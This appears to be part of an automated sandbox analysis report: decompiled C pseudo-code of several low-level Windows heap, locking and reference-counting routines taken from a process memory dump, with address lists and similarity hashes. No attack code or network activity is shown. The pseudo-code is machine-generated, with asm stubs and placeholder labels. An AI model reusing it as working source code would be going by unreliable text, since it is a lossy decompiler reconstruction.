                        				return E02BDB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                        			}











































                        0x02bd8ec7
                        0x02bd8ed9
                        0x02bd8edc
                        0x02bd8ee6
                        0x02bd8ee9
                        0x02bd8eee
                        0x02bd8efc
                        0x02bd8f08
                        0x02c11349
                        0x02c11353
                        0x02c1135d
                        0x02c11366
                        0x02c1136f
                        0x02c11375
                        0x02c1137c
                        0x02c11385
                        0x02c11390
                        0x02c11391
                        0x02c1139c
                        0x02c1139d
                        0x02c113a6
                        0x02c113ac
                        0x02c113b2
                        0x02c113b5
                        0x02c113bc
                        0x02c113bf
                        0x02c113c2
                        0x02c113c5
                        0x02c113c8
                        0x02c113cb
                        0x02c113ce
                        0x02c113d1
                        0x02c113d4
                        0x02c113d7
                        0x02c113da
                        0x02c113dd
                        0x02c113e0
                        0x02c113e3
                        0x02c113e6
                        0x02c113e9
                        0x02c113f6
                        0x02c11400
                        0x02c11400
                        0x02bd8f08
                        0x02bd8f32

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 41bb8382c6a9f8d6a928763dc1fd9a54a258b49f9343ead0e9924b676d47a0b1
                        • Instruction ID: 45ac308656bcbebced1f52e6ddd388e4ce0013fceb6b2fc7d5830653f8db919f
                        • Opcode Fuzzy Hash: 41bb8382c6a9f8d6a928763dc1fd9a54a258b49f9343ead0e9924b676d47a0b1
                        • Instruction Fuzzy Hash: 844193B1D003189EDB14CFAAD981AEDFBF5FB48710F9081AEE509A7640E7705A45CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E02BCE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                        				intOrPtr* _v0;
                        				signed char _v4;
                        				signed int _v8;
                        				void* __ecx;
                        				void* __ebp;
                        				void* _t37;
                        				intOrPtr _t38;
                        				signed int _t44;
                        				signed char _t52;
                        				void* _t54;
                        				intOrPtr* _t56;
                        				void* _t58;
                        				char* _t59;
                        				signed int _t62;
                        
                        				_t58 = __edx;
                        				_push(0);
                        				_push(4);
                        				_push( &_v8);
                        				_push(0x24);
                        				_push(0xffffffff);
                        				if(E02BD9670() < 0) {
                        					L02BEDF30(_t54, _t58, _t35);
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					_push(_t54);
                        					_t52 = _v4;
                        					if(_t52 > 8) {
                        						_t37 = 0xc0000078;
                        					} else {
                        						_t38 =  *0x2c87b9c; // 0x0
                        						_t62 = _t52 & 0x000000ff;
                        						_t59 = L02BB4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                        						if(_t59 == 0) {
                        							_t37 = 0xc0000017;
                        						} else {
                        							_t56 = _v0;
                        							 *(_t59 + 1) = _t52;
                        							 *_t59 = 1;
                        							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                        							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                        							_t44 = _t62 - 1;
                        							if(_t44 <= 7) {
                        								switch( *((intOrPtr*)(_t44 * 4 +  &M02BCE810))) {
                        									case 0:
                        										L6:
                        										 *((intOrPtr*)(_t59 + 8)) = _a8;
                        										goto L7;
                        									case 1:
                        										L13:
                        										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                        										goto L6;
                        									case 2:
                        										L12:
                        										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                        										goto L13;
                        									case 3:
                        										L11:
                        										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                        										goto L12;
                        									case 4:
                        										L10:
                        										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                        										goto L11;
                        									case 5:
                        										L9:
                        										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                        										goto L10;
                        									case 6:
                        										L17:
                        										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                        										goto L9;
                        									case 7:
                        										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                        										goto L17;
                        								}
                        							}
                        							L7:
                        							 *_a40 = _t59;
                        							_t37 = 0;
                        						}
                        					}
                        					return _t37;
                        				} else {
                        					_push(0x20);
                        					asm("ror eax, cl");
                        					return _a4 ^ _v8;
                        				}
                        			}

















                        0x02bce730
                        0x02bce736
                        0x02bce738
                        0x02bce73d
                        0x02bce73e
                        0x02bce740
                        0x02bce749
                        0x02bce765
                        0x02bce76a
                        0x02bce76b
                        0x02bce76c
                        0x02bce76d
                        0x02bce76e
                        0x02bce76f
                        0x02bce775
                        0x02bce777
                        0x02bce77e
                        0x02c0b675
                        0x02bce784
                        0x02bce784
                        0x02bce789
                        0x02bce7a8
                        0x02bce7ac
                        0x02bce807
                        0x02bce7ae
                        0x02bce7ae
                        0x02bce7b1
                        0x02bce7b4
                        0x02bce7b9
                        0x02bce7c0
                        0x02bce7c4
                        0x02bce7ca
                        0x02bce7cc
                        0x00000000
                        0x02bce7d3
                        0x02bce7d6
                        0x00000000
                        0x00000000
                        0x02bce7ff
                        0x02bce802
                        0x00000000
                        0x00000000
                        0x02bce7f9
                        0x02bce7fc
                        0x00000000
                        0x00000000
                        0x02bce7f3
                        0x02bce7f6
                        0x00000000
                        0x00000000
                        0x02bce7ed
                        0x02bce7f0
                        0x00000000
                        0x00000000
                        0x02bce7e7
                        0x02bce7ea
                        0x00000000
                        0x00000000
                        0x02c0b685
                        0x02c0b688
                        0x00000000
                        0x00000000
                        0x02c0b682
                        0x00000000
                        0x00000000
                        0x02bce7cc
                        0x02bce7d9
                        0x02bce7dc
                        0x02bce7de
                        0x02bce7de
                        0x02bce7ac
                        0x02bce7e4
                        0x02bce74b
                        0x02bce751
                        0x02bce759
                        0x02bce761
                        0x02bce761

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da16b8920f0ac9eca064e4749c6e25bdfd177d17b80a1b0ea2c2c3831b7d34b9
                        • Instruction ID: 2aa6d6839310d92fffc3577f8c534f6630bfc3af94d0f0e0c46a201e5659339f
                        • Opcode Fuzzy Hash: da16b8920f0ac9eca064e4749c6e25bdfd177d17b80a1b0ea2c2c3831b7d34b9
                        • Instruction Fuzzy Hash: EE318F75A14249EFD704CF58D840B96B7E8FB08314F1482AAFA04CB341E631ED90CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E02BCBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				void* __ebx;
                        				void* __edi;
                        				intOrPtr _t22;
                        				intOrPtr* _t41;
                        				intOrPtr _t51;
                        
                        				_t51 =  *0x2c86100; // 0xf
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				if(_t51 >= 0x800) {
                        					L12:
                        					return 0;
                        				} else {
                        					goto L1;
                        				}
                        				while(1) {
                        					L1:
                        					_t22 = _t51;
                        					asm("lock cmpxchg [ecx], edx");
                        					if(_t51 == _t22) {
                        						break;
                        					}
                        					_t51 = _t22;
                        					if(_t22 < 0x800) {
                        						continue;
                        					}
                        					goto L12;
                        				}
                        				E02BB2280(0xd, 0xde9f1a0);
                        				_t41 =  *0x2c860f8; // 0x0
                        				if(_t41 != 0) {
                        					 *0x2c860f8 =  *_t41;
                        					 *0x2c860fc =  *0x2c860fc + 0xffff;
                        				}
                        				E02BAFFB0(_t41, 0x800, 0xde9f1a0);
                        				if(_t41 != 0) {
                        					L6:
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                        					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                        					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                        					do {
                        						asm("lock xadd [0x2c860f0], ax");
                        						 *((short*)(_t41 + 0x34)) = 1;
                        					} while (1 == 0);
                        					goto L8;
                        				} else {
                        					_t41 = L02BB4620(0x2c86100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                        					if(_t41 == 0) {
                        						L11:
                        						asm("lock dec dword [0x2c86100]");
                        						L8:
                        						return _t41;
                        					}
                        					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                        					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                        					if(_t41 == 0) {
                        						goto L11;
                        					}
                        					goto L6;
                        				}
                        			}










                        0x02bcbc36
                        0x02bcbc42
                        0x02bcbc45
                        0x02bcbc4a
                        0x02bcbd35
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bcbc50
                        0x02bcbc50
                        0x02bcbc58
                        0x02bcbc5a
                        0x02bcbc60
                        0x00000000
                        0x00000000
                        0x02c0a4f2
                        0x02c0a4f6
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c0a4fc
                        0x02bcbc79
                        0x02bcbc7e
                        0x02bcbc86
                        0x02bcbd16
                        0x02bcbd20
                        0x02bcbd20
                        0x02bcbc8d
                        0x02bcbc94
                        0x02bcbcbd
                        0x02bcbcca
                        0x02bcbccb
                        0x02bcbccc
                        0x02bcbccd
                        0x02bcbcce
                        0x02bcbcd4
                        0x02bcbcea
                        0x02bcbcee
                        0x02bcbcf2
                        0x02bcbd00
                        0x02bcbd04
                        0x00000000
                        0x02bcbc96
                        0x02bcbcab
                        0x02bcbcaf
                        0x02bcbd2c
                        0x02bcbd2c
                        0x02bcbd09
                        0x00000000
                        0x02bcbd09
                        0x02bcbcb1
                        0x02bcbcb5
                        0x02bcbcbb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bcbcbb

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f02b490e675dd3695e32fec1d4cb820cc4222948da031de8130e3fe37242b37
                        • Instruction ID: 5084327340910ac9ab5cf1405150427024860edf8a2f05e831882b3afc291fe9
                        • Opcode Fuzzy Hash: 8f02b490e675dd3695e32fec1d4cb820cc4222948da031de8130e3fe37242b37
                        • Instruction Fuzzy Hash: 4B310132A006159BCB01EF58D8817AA73B8FF18319F2085B9ED45DB241E774D905CBC4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02B99100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                        				signed int _t53;
                        				signed int _t56;
                        				signed int* _t60;
                        				signed int _t63;
                        				signed int _t66;
                        				signed int _t69;
                        				void* _t70;
                        				intOrPtr* _t72;
                        				void* _t78;
                        				void* _t79;
                        				signed int _t80;
                        				intOrPtr _t82;
                        				void* _t85;
                        				void* _t88;
                        				void* _t89;
                        
                        				_t84 = __esi;
                        				_t70 = __ecx;
                        				_t68 = __ebx;
                        				_push(0x2c);
                        				_push(0x2c6f6e8);
                        				E02BED0E8(__ebx, __edi, __esi);
                        				 *((char*)(_t85 - 0x1d)) = 0;
                        				_t82 =  *((intOrPtr*)(_t85 + 8));
                        				if(_t82 == 0) {
                        					L4:
                        					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                        						E02C688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                        					}
                        					L5:
                        					return E02BED130(_t68, _t82, _t84);
                        				}
                        				_t88 = _t82 -  *0x2c886c0; // 0x27307b0
                        				if(_t88 == 0) {
                        					goto L4;
                        				}
                        				_t89 = _t82 -  *0x2c886b8; // 0x0
                        				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					goto L4;
                        				} else {
                        					E02BB2280(_t82 + 0xe0, _t82 + 0xe0);
                        					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                        					__eflags =  *((char*)(_t82 + 0xe5));
                        					if(__eflags != 0) {
                        						E02C688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                        						goto L12;
                        					} else {
                        						__eflags =  *((char*)(_t82 + 0xe4));
                        						if( *((char*)(_t82 + 0xe4)) == 0) {
                        							 *((char*)(_t82 + 0xe4)) = 1;
                        							_push(_t82);
                        							_push( *((intOrPtr*)(_t82 + 0x24)));
                        							E02BDAFD0();
                        						}
                        						while(1) {
                        							_t60 = _t82 + 8;
                        							 *(_t85 - 0x2c) = _t60;
                        							_t68 =  *_t60;
                        							_t80 = _t60[1];
                        							 *(_t85 - 0x28) = _t68;
                        							 *(_t85 - 0x24) = _t80;
                        							while(1) {
                        								L10:
                        								__eflags = _t80;
                        								if(_t80 == 0) {
                        									break;
                        								}
                        								_t84 = _t68;
                        								 *(_t85 - 0x30) = _t80;
                        								 *(_t85 - 0x24) = _t80 - 1;
                        								asm("lock cmpxchg8b [edi]");
                        								_t68 = _t84;
                        								 *(_t85 - 0x28) = _t68;
                        								 *(_t85 - 0x24) = _t80;
                        								__eflags = _t68 - _t84;
                        								_t82 =  *((intOrPtr*)(_t85 + 8));
                        								if(_t68 != _t84) {
                        									continue;
                        								}
                        								__eflags = _t80 -  *(_t85 - 0x30);
                        								if(_t80 !=  *(_t85 - 0x30)) {
                        									continue;
                        								}
                        								__eflags = _t80;
                        								if(_t80 == 0) {
                        									break;
                        								}
                        								_t63 = 0;
                        								 *(_t85 - 0x34) = 0;
                        								_t84 = 0;
                        								__eflags = 0;
                        								while(1) {
                        									 *(_t85 - 0x3c) = _t84;
                        									__eflags = _t84 - 3;
                        									if(_t84 >= 3) {
                        										break;
                        									}
                        									__eflags = _t63;
                        									if(_t63 != 0) {
                        										L40:
                        										_t84 =  *_t63;
                        										__eflags = _t84;
                        										if(_t84 != 0) {
                        											_t84 =  *(_t84 + 4);
                        											__eflags = _t84;
                        											if(_t84 != 0) {
                        												 *0x2c8b1e0(_t63, _t82);
                        												 *_t84();
                        											}
                        										}
                        										do {
                        											_t60 = _t82 + 8;
                        											 *(_t85 - 0x2c) = _t60;
                        											_t68 =  *_t60;
                        											_t80 = _t60[1];
                        											 *(_t85 - 0x28) = _t68;
                        											 *(_t85 - 0x24) = _t80;
                        											goto L10;
                        										} while (_t63 == 0);
                        										goto L40;
                        									}
                        									_t69 = 0;
                        									__eflags = 0;
                        									while(1) {
                        										 *(_t85 - 0x38) = _t69;
                        										__eflags = _t69 -  *0x2c884c0;
                        										if(_t69 >=  *0x2c884c0) {
                        											break;
                        										}
                        										__eflags = _t63;
                        										if(_t63 != 0) {
                        											break;
                        										}
                        										_t66 = E02C69063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                        										__eflags = _t66;
                        										if(_t66 == 0) {
                        											_t63 = 0;
                        											__eflags = 0;
                        										} else {
                        											_t63 = _t66 + 0xfffffff4;
                        										}
                        										 *(_t85 - 0x34) = _t63;
                        										_t69 = _t69 + 1;
                        									}
                        									_t84 = _t84 + 1;
                        								}
                        								__eflags = _t63;
                        							}
                        							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                        							 *((char*)(_t82 + 0xe5)) = 1;
                        							 *((char*)(_t85 - 0x1d)) = 1;
                        							L12:
                        							 *(_t85 - 4) = 0xfffffffe;
                        							E02B9922A(_t82);
                        							_t53 = E02BB7D50();
                        							__eflags = _t53;
                        							if(_t53 != 0) {
                        								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        							} else {
                        								_t56 = 0x7ffe0386;
                        							}
                        							__eflags =  *_t56;
                        							if( *_t56 != 0) {
                        								_t56 = E02C68B58(_t82);
                        							}
                        							__eflags =  *((char*)(_t85 - 0x1d));
                        							if( *((char*)(_t85 - 0x1d)) != 0) {
                        								__eflags = _t82 -  *0x2c886c0; // 0x27307b0
                        								if(__eflags != 0) {
                        									__eflags = _t82 -  *0x2c886b8; // 0x0
                        									if(__eflags == 0) {
                        										_t79 = 0x2c886bc;
                        										_t72 = 0x2c886b8;
                        										goto L18;
                        									}
                        									__eflags = _t56 | 0xffffffff;
                        									asm("lock xadd [edi], eax");
                        									if(__eflags == 0) {
                        										E02B99240(_t68, _t82, _t82, _t84, __eflags);
                        									}
                        								} else {
                        									_t79 = 0x2c886c4;
                        									_t72 = 0x2c886c0;
                        									L18:
                        									E02BC9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                        								}
                        							}
                        							goto L5;
                        						}
                        					}
                        				}
                        			}


















                        0x02b99100
                        0x02b99100
                        0x02b99100
                        0x02b99100
                        0x02b99102
                        0x02b99107
                        0x02b9910c
                        0x02b99110
                        0x02b99115
                        0x02b99136
                        0x02b99143
                        0x02bf37e4
                        0x02bf37e4
                        0x02b99149
                        0x02b9914e
                        0x02b9914e
                        0x02b99117
                        0x02b9911d
                        0x00000000
                        0x00000000
                        0x02b9911f
                        0x02b99125
                        0x00000000
                        0x02b99151
                        0x02b99158
                        0x02b9915d
                        0x02b99161
                        0x02b99168
                        0x02bf3715
                        0x00000000
                        0x02b9916e
                        0x02b9916e
                        0x02b99175
                        0x02b99177
                        0x02b9917e
                        0x02b9917f
                        0x02b99182
                        0x02b99182
                        0x02b99187
                        0x02b99187
                        0x02b9918a
                        0x02b9918d
                        0x02b9918f
                        0x02b99192
                        0x02b99195
                        0x02b99198
                        0x02b99198
                        0x02b99198
                        0x02b9919a
                        0x00000000
                        0x00000000
                        0x02bf371f
                        0x02bf3721
                        0x02bf3727
                        0x02bf372f
                        0x02bf3733
                        0x02bf3735
                        0x02bf3738
                        0x02bf373b
                        0x02bf373d
                        0x02bf3740
                        0x00000000
                        0x00000000
                        0x02bf3746
                        0x02bf3749
                        0x00000000
                        0x00000000
                        0x02bf374f
                        0x02bf3751
                        0x00000000
                        0x00000000
                        0x02bf3757
                        0x02bf3759
                        0x02bf375c
                        0x02bf375c
                        0x02bf375e
                        0x02bf375e
                        0x02bf3761
                        0x02bf3764
                        0x00000000
                        0x00000000
                        0x02bf3766
                        0x02bf3768
                        0x02bf37a3
                        0x02bf37a3
                        0x02bf37a5
                        0x02bf37a7
                        0x02bf37ad
                        0x02bf37b0
                        0x02bf37b2
                        0x02bf37bc
                        0x02bf37c2
                        0x02bf37c2
                        0x02bf37b2
                        0x02b99187
                        0x02b99187
                        0x02b9918a
                        0x02b9918d
                        0x02b9918f
                        0x02b99192
                        0x02b99195
                        0x00000000
                        0x02b99195
                        0x00000000
                        0x02b99187
                        0x02bf376a
                        0x02bf376a
                        0x02bf376c
                        0x02bf376c
                        0x02bf376f
                        0x02bf3775
                        0x00000000
                        0x00000000
                        0x02bf3777
                        0x02bf3779
                        0x00000000
                        0x00000000
                        0x02bf3782
                        0x02bf3787
                        0x02bf3789
                        0x02bf3790
                        0x02bf3790
                        0x02bf378b
                        0x02bf378b
                        0x02bf378b
                        0x02bf3792
                        0x02bf3795
                        0x02bf3795
                        0x02bf3798
                        0x02bf3798
                        0x02bf379b
                        0x02bf379b
                        0x02b991a3
                        0x02b991a9
                        0x02b991b0
                        0x02b991b4
                        0x02b991b4
                        0x02b991bb
                        0x02b991c0
                        0x02b991c5
                        0x02b991c7
                        0x02bf37da
                        0x02b991cd
                        0x02b991cd
                        0x02b991cd
                        0x02b991d2
                        0x02b991d5
                        0x02b99239
                        0x02b99239
                        0x02b991d7
                        0x02b991db
                        0x02b991e1
                        0x02b991e7
                        0x02b991fd
                        0x02b99203
                        0x02b9921e
                        0x02b99223
                        0x00000000
                        0x02b99223
                        0x02b99205
                        0x02b99208
                        0x02b9920c
                        0x02b99214
                        0x02b99214
                        0x02b991e9
                        0x02b991e9
                        0x02b991ee
                        0x02b991f3
                        0x02b991f3
                        0x02b991f3
                        0x02b991e7
                        0x00000000
                        0x02b991db
                        0x02b99187
                        0x02b99168

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ae19d3ef20eb901dc55db8e87e3918bfb40f1e93c3cbcd2fdb5cbce831488fa
                        • Instruction ID: 14aad9a6dbbdeb09de70f29b58610d0e6527c9e2e45bc674bf41c3497075ece4
                        • Opcode Fuzzy Hash: 9ae19d3ef20eb901dc55db8e87e3918bfb40f1e93c3cbcd2fdb5cbce831488fa
                        • Instruction Fuzzy Hash: C8318E75A01A95EFDFA5DB68C488BACBBB2FB48354F1882EDC40567251C370A9C4CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E02BC1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr* _v20;
                        				void* _t22;
                        				char _t23;
                        				void* _t36;
                        				intOrPtr _t42;
                        				intOrPtr _t43;
                        
                        				_v12 = __ecx;
                        				_t43 = 0;
                        				_v20 = __edx;
                        				_t42 =  *__edx;
                        				 *__edx = 0;
                        				_v16 = _t42;
                        				_push( &_v8);
                        				_push(0);
                        				_push(0);
                        				_push(6);
                        				_push(0);
                        				_push(__ecx);
                        				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                        				_push(_t36);
                        				_t22 = E02BBF460();
                        				if(_t22 < 0) {
                        					if(_t22 == 0xc0000023) {
                        						goto L1;
                        					}
                        					L3:
                        					return _t43;
                        				}
                        				L1:
                        				_t23 = _v8;
                        				if(_t23 != 0) {
                        					_t38 = _a4;
                        					if(_t23 >  *_a4) {
                        						_t42 = L02BB4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                        						if(_t42 == 0) {
                        							goto L3;
                        						}
                        						_t23 = _v8;
                        					}
                        					_push( &_v8);
                        					_push(_t23);
                        					_push(_t42);
                        					_push(6);
                        					_push(_t43);
                        					_push(_v12);
                        					_push(_t36);
                        					if(E02BBF460() < 0) {
                        						if(_t42 != 0 && _t42 != _v16) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                        						}
                        						goto L3;
                        					}
                        					 *_v20 = _t42;
                        					 *_a4 = _v8;
                        				}
                        				_t43 = 1;
                        				goto L3;
                        			}












                        0x02bc1dc2
                        0x02bc1dc5
                        0x02bc1dc7
                        0x02bc1dcc
                        0x02bc1dce
                        0x02bc1dd6
                        0x02bc1ddf
                        0x02bc1de0
                        0x02bc1de1
                        0x02bc1de5
                        0x02bc1de8
                        0x02bc1def
                        0x02bc1df0
                        0x02bc1df6
                        0x02bc1df7
                        0x02bc1dfe
                        0x02bc1e1a
                        0x00000000
                        0x00000000
                        0x02bc1e0b
                        0x02bc1e12
                        0x02bc1e12
                        0x02bc1e00
                        0x02bc1e00
                        0x02bc1e05
                        0x02bc1e1e
                        0x02bc1e23
                        0x02c0570f
                        0x02c05713
                        0x00000000
                        0x00000000
                        0x02c05719
                        0x02c05719
                        0x02bc1e2c
                        0x02bc1e2d
                        0x02bc1e2e
                        0x02bc1e2f
                        0x02bc1e31
                        0x02bc1e32
                        0x02bc1e35
                        0x02bc1e3d
                        0x02c05723
                        0x02c0573d
                        0x02c0573d
                        0x00000000
                        0x02c05723
                        0x02bc1e49
                        0x02bc1e4e
                        0x02bc1e4e
                        0x02bc1e09
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction ID: 8017d833295f656468315ca7a3998b5715e0f6eb0d3afffdc7d9b9bbe1e912bf
                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction Fuzzy Hash: 19217172610119FBD721CF9DCC80EAABBBDFF85644F254099E505E7211D774AD01DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E02BB0050(void* __ecx) {
                        				signed int _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr* _t30;
                        				intOrPtr* _t31;
                        				signed int _t34;
                        				void* _t40;
                        				void* _t41;
                        				signed int _t44;
                        				intOrPtr _t47;
                        				signed int _t58;
                        				void* _t59;
                        				void* _t61;
                        				void* _t62;
                        				signed int _t64;
                        
                        				_push(__ecx);
                        				_v8 =  *0x2c8d360 ^ _t64;
                        				_t61 = __ecx;
                        				_t2 = _t61 + 0x20; // 0x20
                        				E02BC9ED0(_t2, 1, 0);
                        				_t52 =  *(_t61 + 0x8c);
                        				_t4 = _t61 + 0x8c; // 0x8c
                        				_t40 = _t4;
                        				do {
                        					_t44 = _t52;
                        					_t58 = _t52 & 0x00000001;
                        					_t24 = _t44;
                        					asm("lock cmpxchg [ebx], edx");
                        					_t52 = _t44;
                        				} while (_t52 != _t44);
                        				if(_t58 == 0) {
                        					L7:
                        					_pop(_t59);
                        					_pop(_t62);
                        					_pop(_t41);
                        					return E02BDB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                        				}
                        				asm("lock xadd [esi], eax");
                        				_t47 =  *[fs:0x18];
                        				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                        				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t30 != 0) {
                        					if( *_t30 == 0) {
                        						goto L4;
                        					}
                        					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        					L5:
                        					if( *_t31 != 0) {
                        						_t18 = _t61 + 0x78; // 0x78
                        						E02C68A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                        					}
                        					_t52 =  *(_t61 + 0x5c);
                        					_t11 = _t61 + 0x78; // 0x78
                        					_t34 = E02BC9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                        					_t24 = _t34 | 0xffffffff;
                        					asm("lock xadd [esi], eax");
                        					if((_t34 | 0xffffffff) == 0) {
                        						 *0x2c8b1e0(_t61);
                        						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                        					}
                        					goto L7;
                        				}
                        				L4:
                        				_t31 = 0x7ffe0386;
                        				goto L5;
                        			}




















                        0x02bb0055
                        0x02bb005d
                        0x02bb0062
                        0x02bb006c
                        0x02bb006f
                        0x02bb0074
                        0x02bb007a
                        0x02bb007a
                        0x02bb0080
                        0x02bb0080
                        0x02bb0087
                        0x02bb008d
                        0x02bb008f
                        0x02bb0093
                        0x02bb0095
                        0x02bb009b
                        0x02bb00f8
                        0x02bb00fb
                        0x02bb00fc
                        0x02bb00ff
                        0x02bb0108
                        0x02bb0108
                        0x02bb00a2
                        0x02bb00a6
                        0x02bb00b3
                        0x02bb00bc
                        0x02bb00c5
                        0x02bb00ca
                        0x02bfc01e
                        0x00000000
                        0x00000000
                        0x02bfc02d
                        0x02bb00d5
                        0x02bb00d9
                        0x02bfc03d
                        0x02bfc046
                        0x02bfc046
                        0x02bb00df
                        0x02bb00e2
                        0x02bb00ea
                        0x02bb00ef
                        0x02bb00f2
                        0x02bb00f6
                        0x02bb0111
                        0x02bb0117
                        0x02bb0117
                        0x00000000
                        0x02bb00f6
                        0x02bb00d0
                        0x02bb00d0
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 87d1f96523a19bf7bad5292e7fb8406b4db9a488a8dcfb91578f86acdc928850
                        • Instruction ID: e7cdff236ce35c6ccb09dbc169f0a66d9358f92caf9e361088b96757cb8c73cc
